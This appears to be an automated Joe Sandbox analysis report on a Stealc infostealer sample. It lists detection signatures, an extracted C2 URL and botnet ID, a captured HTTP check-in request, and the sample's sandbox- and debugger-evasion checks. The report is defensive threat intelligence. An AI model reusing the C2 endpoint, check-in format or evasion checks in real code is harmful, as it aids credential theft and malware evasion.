Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1525809
MD5:8baeb58f65c1b9077a14792bd25a17f3
SHA1:9908569a2920d3693bb0eba3692c48132a5b25a9
SHA256:f9c5550df902ffa0b701eb230cb26c712d35688efcae92636488915de920c6a8
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 2552 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 8BAEB58F65C1B9077A14792BD25A17F3)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000003.1586910979.00000000053C0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000002.1627926455.000000000166E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 2552JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 2552JoeSecurity_StealcYara detected StealcJoe Security

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.file.exe.ee0000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-04T16:38:40.006563+020020442431Malware Command and Control Activity Detected192.168.2.949706185.215.113.3780TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: file.exeAvira: detected
                Antivirus detection for URL or domain
                Source: http://185.215.113.37/URL Reputation: Label: malware
                Source: http://185.215.113.37URL Reputation: Label: malware
                Source: http://185.215.113.37/e2b1563c6670f193.phpURL Reputation: Label: malware
                Found malware configuration
                Source: 0.2.file.exe.ee0000.0.unpackMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
                Multi AV Scanner detection for submitted file
                Source: file.exeReversingLabs: Detection: 44%
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: file.exeJoe Sandbox ML: detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EEC820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,0_2_00EEC820
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EE9AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00EE9AC0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EE7240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_00EE7240
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EE9B60 CryptUnprotectData,LocalAlloc,LocalFree,0_2_00EE9B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EF8EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_00EF8EA0
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EF38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00EF38B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EF4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00EF4910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EEDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_00EEDA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EEE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_00EEE430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EF4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00EF4570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EEED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_00EEED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EE16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00EE16D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EF3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00EF3EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EEF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00EEF6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EEBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_00EEBE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EEDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00EEDE10

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.9:49706 -> 185.215.113.37:80
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: http://185.215.113.37/e2b1563c6670f193.php
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HDBGDHDAECBGDHJKFIDGHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 44 42 47 44 48 44 41 45 43 42 47 44 48 4a 4b 46 49 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 44 34 42 42 33 31 42 36 44 44 38 31 32 36 33 38 30 30 30 39 36 0d 0a 2d 2d 2d 2d 2d 2d 48 44 42 47 44 48 44 41 45 43 42 47 44 48 4a 4b 46 49 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 48 44 42 47 44 48 44 41 45 43 42 47 44 48 4a 4b 46 49 44 47 2d 2d 0d 0a Data Ascii: ------HDBGDHDAECBGDHJKFIDGContent-Disposition: form-data; name="hwid"5D4BB31B6DD81263800096------HDBGDHDAECBGDHJKFIDGContent-Disposition: form-data; name="build"doma------HDBGDHDAECBGDHJKFIDG--
                Source: Joe Sandbox ViewIP Address: 185.215.113.37 185.215.113.37
                Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EE4880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_00EE4880
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: unknownHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HDBGDHDAECBGDHJKFIDGHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 44 42 47 44 48 44 41 45 43 42 47 44 48 4a 4b 46 49 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 44 34 42 42 33 31 42 36 44 44 38 31 32 36 33 38 30 30 30 39 36 0d 0a 2d 2d 2d 2d 2d 2d 48 44 42 47 44 48 44 41 45 43 42 47 44 48 4a 4b 46 49 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 48 44 42 47 44 48 44 41 45 43 42 47 44 48 4a 4b 46 49 44 47 2d 2d 0d 0a Data Ascii: ------HDBGDHDAECBGDHJKFIDGContent-Disposition: form-data; name="hwid"5D4BB31B6DD81263800096------HDBGDHDAECBGDHJKFIDGContent-Disposition: form-data; name="build"doma------HDBGDHDAECBGDHJKFIDG--
                Source: file.exe, 00000000.00000002.1627926455.000000000166E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37
                Source: file.exe, 00000000.00000002.1627926455.00000000016B3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1627926455.000000000166E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1627926455.00000000016CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/
                Source: file.exe, 00000000.00000002.1627926455.00000000016CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
                Source: file.exe, 00000000.00000002.1627926455.00000000016B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpW
                Source: file.exe, 00000000.00000002.1627926455.00000000016B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpg

                System Summary

                barindex
                PE file contains section with special chars
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012AC9D00_2_012AC9D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_013C282D0_2_013C282D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012AA0F90_2_012AA0F9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011DF0C60_2_011DF0C6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01297ACF0_2_01297ACF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011C65060_2_011C6506
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011B25040_2_011B2504
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012AF5910_2_012AF591
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012B0C1D0_2_012B0C1D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0126475C0_2_0126475C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012AD7A80_2_012AD7A8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011FCF860_2_011FCF86
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01223FE70_2_01223FE7
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 00EE45C0 appears 316 times
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exeStatic PE information: Section: aufxidhi ZLIB complexity 0.9946545738462714
                Source: file.exeStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
                Source: file.exe, 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.1586910979.00000000053C0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
                Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EF8680 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,0_2_00EF8680
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EF3720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_00EF3720
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\ELOEFHSH.htmJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: file.exeReversingLabs: Detection: 44%
                Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
                Source: file.exeStatic file information: File size 1831424 > 1048576
                Source: file.exeStatic PE information: Raw size of aufxidhi is bigger than: 0x100000 < 0x199000

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.ee0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;aufxidhi:EW;uxstyozv:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;aufxidhi:EW;uxstyozv:EW;.taggant:EW;
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EF9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00EF9860
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: file.exeStatic PE information: real checksum: 0x1cee72 should be: 0x1c011f
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: aufxidhi
                Source: file.exeStatic PE information: section name: uxstyozv
                Source: file.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0133C926 push 54677472h; mov dword ptr [esp], esp0_2_0133C961
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0136212C push 6346F372h; mov dword ptr [esp], esi0_2_01362696
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0138B103 push 3B3B88F1h; mov dword ptr [esp], esp0_2_0138B14C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0138B103 push 385555A1h; mov dword ptr [esp], esp0_2_0138B1A3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0139C975 push edi; mov dword ptr [esp], 5342B025h0_2_0139C985
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0139C975 push ecx; mov dword ptr [esp], 2341E4E6h0_2_0139D4E3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0137E952 push ecx; mov dword ptr [esp], eax0_2_0137E912
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_013B3953 push ecx; mov dword ptr [esp], eax0_2_013B3A4D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_013B3953 push edi; mov dword ptr [esp], esp0_2_013B3B69
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01571194 push 2A3EE55Fh; mov dword ptr [esp], ebx0_2_015711C1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01571194 push 79C3A7A1h; mov dword ptr [esp], ebx0_2_01571208
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01571194 push ecx; mov dword ptr [esp], edx0_2_01571250
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01571194 push ebx; mov dword ptr [esp], ebp0_2_015712EA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_013979F0 push eax; mov dword ptr [esp], ecx0_2_01397A3D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0131F9FD push 650C16C7h; mov dword ptr [esp], ebx0_2_0131FA58
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0131F9FD push ebx; mov dword ptr [esp], eax0_2_0131FA87
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0131F9FD push ebx; mov dword ptr [esp], esp0_2_0131FAF8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EFB035 push ecx; ret 0_2_00EFB048
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012F59C1 push 3BFEB407h; mov dword ptr [esp], esi0_2_012F59ED
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012AC9D0 push ebx; mov dword ptr [esp], 4D8D1637h0_2_012ACB21
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012AC9D0 push 142B6EF9h; mov dword ptr [esp], eax0_2_012ACB43
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012AC9D0 push 2DC613C0h; mov dword ptr [esp], eax0_2_012ACB7D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012AC9D0 push ecx; mov dword ptr [esp], ebp0_2_012ACBB3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012AC9D0 push eax; mov dword ptr [esp], esi0_2_012ACBD2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012AC9D0 push esi; mov dword ptr [esp], edi0_2_012ACC6C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012AC9D0 push 65A50FB0h; mov dword ptr [esp], eax0_2_012ACC9E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012AC9D0 push 2B254463h; mov dword ptr [esp], eax0_2_012ACD5A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012AC9D0 push 4E286976h; mov dword ptr [esp], ebx0_2_012ACDAB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012AC9D0 push eax; mov dword ptr [esp], edi0_2_012ACE35
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012AC9D0 push 419DC912h; mov dword ptr [esp], ecx0_2_012ACE44
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012AC9D0 push ebx; mov dword ptr [esp], ecx0_2_012ACE61
                Source: file.exeStatic PE information: section name: aufxidhi entropy: 7.9520679718814815

                Boot Survival

                barindex
                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EF9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00EF9860

                Malware Analysis System Evasion

                barindex
                Found evasive API chain (may stop execution after checking locale)
                Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-13624
                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11420F8 second address: 11420FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A8117 second address: 12A811B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A811B second address: 12A812A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FF8E8F833B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A812A second address: 12A8139 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 je 00007FF8E8F8DBB6h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BAA11 second address: 12BAA1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push edx 0x0000000a pop edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BABA3 second address: 12BABAC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BAD7D second address: 12BAD9B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF8E8F833BFh 0x00000008 pushad 0x00000009 popad 0x0000000a jnc 00007FF8E8F833B6h 0x00000010 popad 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BAD9B second address: 12BADA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BAED5 second address: 12BAEDF instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BAEDF second address: 12BAEF9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF8E8F8DBC4h 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
